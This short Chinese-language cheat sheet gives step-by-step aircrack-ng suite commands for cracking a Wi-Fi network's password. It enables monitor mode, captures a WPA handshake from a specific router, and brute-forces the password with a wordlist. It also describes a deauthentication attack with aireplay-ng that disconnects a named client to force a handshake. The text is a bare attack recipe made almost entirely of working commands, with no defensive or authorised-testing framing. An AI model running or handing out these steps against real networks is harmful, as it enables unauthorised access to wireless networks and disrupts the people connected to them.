1. wlan0開啟monitor mode : airmon-ng start wlan0
2. 查看附近的無線網絡 : airodump-ng wlan0mon
3. 抓取無線網絡數據包 : airodump-ng -c 6 --bssid F0:B4:29:29:8A:03 -w name wlan0mon (當出現handshake時說明抓包成功)
-c : CH的值 ; --bssid : BSSID的值 ; -w : 存放抓取數據包的文件名
4. 通過密碼字典文件暴力破解該無線網絡的密碼 : aircrack-ng -w /usr/share/wordlists/sqlmap.txt name-01.cap
5. 關閉無線網卡的monitor mode : airmon-ng stop wlan0mon
如果在步驟3,我們一直抓不到握手包 , 可以攻擊一下無線路由,
a) 新開一個terminal
b) aireplay-ng -0 1 -a F0:B4:29:29:8A:03 -c 08:ED:B9:89:FB:B1 wlan0mon
-0 : 采用deauth攻擊模式,后面加攻擊次數,1-10 即可
-a : 路由器的mac地址
-c : 客戶端的mac地址 (我們在步驟2看到的STATION下面的值就是某一個路由對應的客戶端)